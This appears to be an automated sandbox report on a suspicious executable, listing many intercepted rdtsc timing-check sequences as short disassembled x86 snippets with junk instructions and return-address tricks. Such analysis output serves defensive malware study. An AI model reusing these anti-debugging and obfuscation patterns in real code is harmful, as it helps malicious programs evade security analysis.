                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6CBB4 second address: D6CC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F122870CBC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D22A5h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F122870CBC8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 jne 00007F122870CBD9h 0x00000039 xchg eax, ebx 0x0000003a jnl 00007F122870CBD4h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FC3B second address: D6FC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d cld 0x0000000e pop edi 0x0000000f add dword ptr [ebp+12462954h], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F1228D24AB8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 jp 00007F1228D24ABCh 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ebx 0x0000003c push edx 0x0000003d pop edx 0x0000003e pop ebx 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70D62 second address: D70D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70D66 second address: D70D86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F1228D24AB6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F1228D24ABCh 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D01 second address: D72D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F122870CBC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D12 second address: D72D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FDE7 second address: D6FDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F122870CBC6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D16 second address: D72D20 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1228D24AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FDF1 second address: D6FDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D20 second address: D72D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1228D24ABFh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FDF5 second address: D6FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push edi 0x0000000c add ebx, dword ptr [ebp+12462633h] 0x00000012 pop edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+1246281Bh] 0x00000029 mov eax, dword ptr [ebp+122D0F15h] 0x0000002f mov bx, dx 0x00000032 push FFFFFFFFh 0x00000034 cld 0x00000035 sub dword ptr [ebp+12472FF5h], eax 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 jmp 00007F122870CBD2h 0x00000046 popad 0x00000047 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D3D second address: D72D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B712 second address: D2B724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jns 00007F122870CBC6h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B724 second address: D2B742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B742 second address: D2B747 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75794 second address: D757FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1228D24AB8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+124621A2h], esi 0x00000031 mov bx, 6A13h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F1228D24AB8h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 sub dword ptr [ebp+12461FD3h], eax 0x00000057 mov ebx, dword ptr [ebp+122D3951h] 0x0000005d push eax 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 pop edi 0x00000063 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74A3C second address: D74A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B10 second address: D74B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B14 second address: D74B1E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7677C second address: D767FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1228D24ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F1228D24AB8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F1228D24AC7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F1228D24AB8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D2887h] 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 jp 00007F1228D24AB6h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D767FC second address: D76801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76801 second address: D76806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76806 second address: D7681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F122870CBC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F122870CBCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7681E second address: D76822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75907 second address: D759AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F122870CBC8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov ebx, dword ptr [ebp+122D27A1h] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+12482885h], esi 0x00000041 mov eax, dword ptr [ebp+122D0029h] 0x00000047 sub dword ptr [ebp+12461FD3h], edx 0x0000004d push FFFFFFFFh 0x0000004f mov ebx, dword ptr [ebp+122D3759h] 0x00000055 call 00007F122870CBD2h 0x0000005a jmp 00007F122870CBD5h 0x0000005f pop ebx 0x00000060 nop 0x00000061 pushad 0x00000062 jl 00007F122870CBC8h 0x00000068 jc 00007F122870CBD0h 0x0000006e jmp 00007F122870CBCAh 0x00000073 popad 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 jnl 00007F122870CBC6h 0x0000007f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D759AD second address: D759B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D759B1 second address: D759B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D776F7 second address: D77786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F1228D24AB8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 add dword ptr [ebp+12461326h], ecx 0x00000027 mov ebx, eax 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F1228D24AB8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov bx, 46B5h 0x00000049 jmp 00007F1228D24AC6h 0x0000004e push 00000000h 0x00000050 jmp 00007F1228D24AC6h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D786A3 second address: D786A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7964F second address: D796B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov bx, dx 0x0000000f push 00000000h 0x00000011 jmp 00007F1228D24AC8h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1228D24AB8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 je 00007F1228D24AB8h 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D796B7 second address: D796D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBD7h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D796D2 second address: D796EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F1228D24AB8h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A6D9 second address: D7A6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C75E second address: D7C762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F7BE second address: D7F7C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18D6A second address: D18D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C899 second address: D7C89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B7B8 second address: D7B7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C89F second address: D7C941 instructions: 0x00000000 rdtsc 0x00000002 je 00007F122870CBD9h 0x00000008 jmp 00007F122870CBD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F122870CBC8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sub dword ptr [ebp+122DB6BFh], esi 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov ebx, dword ptr [ebp+12462733h] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov dword ptr [ebp+1247A146h], edx 0x0000004c mov eax, dword ptr [ebp+122D0AE1h] 0x00000052 cld 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F122870CBC8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000014h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F122870CBD6h 0x00000077 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B7BC second address: D7B7C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C941 second address: D7C95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBD7h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B7C2 second address: D7B7E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C95C second address: D7C969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D840 second address: D7D844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D800C8 second address: D800D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F122870CBC6h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C969 second address: D7C973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D844 second address: D7D84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81E32 second address: D81E3C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1228D24AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D800D4 second address: D800D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C973 second address: D7C979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81E3C second address: D81E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81E42 second address: D81EA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F1228D24AB8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jmp 00007F1228D24ABFh 0x0000002a jne 00007F1228D24ABCh 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D1B08h] 0x00000038 push 00000000h 0x0000003a mov ebx, dword ptr [ebp+122D1A9Fh] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D830E8 second address: D830EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D17E second address: D2D197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F1228D24AC0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B932 second address: D8B93C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F122870CBD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BC11 second address: D8BC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95CF7 second address: D95CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95CFB second address: D95D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1228D24AC5h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95D18 second address: D95D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95D1E second address: D95D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95D24 second address: D95D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95D28 second address: D95D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F1228D24ABAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95D3F second address: D95D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD2h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95D55 second address: D95D88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1228D24AC7h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D949F1 second address: D94A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD0h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9557E second address: D95588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1228D24AB6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95588 second address: D955A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D955A8 second address: D955AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95847 second address: D9584D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9584D second address: D9585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F1228D24AB6h 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9585B second address: D9587F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F122870CBD5h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F122870CBCDh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F122870CBC6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9587F second address: D95883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95883 second address: D958A0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F122870CBCFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D958A0 second address: D958A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D282C7 second address: D282DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F122870CBC6h 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007F122870CBC6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
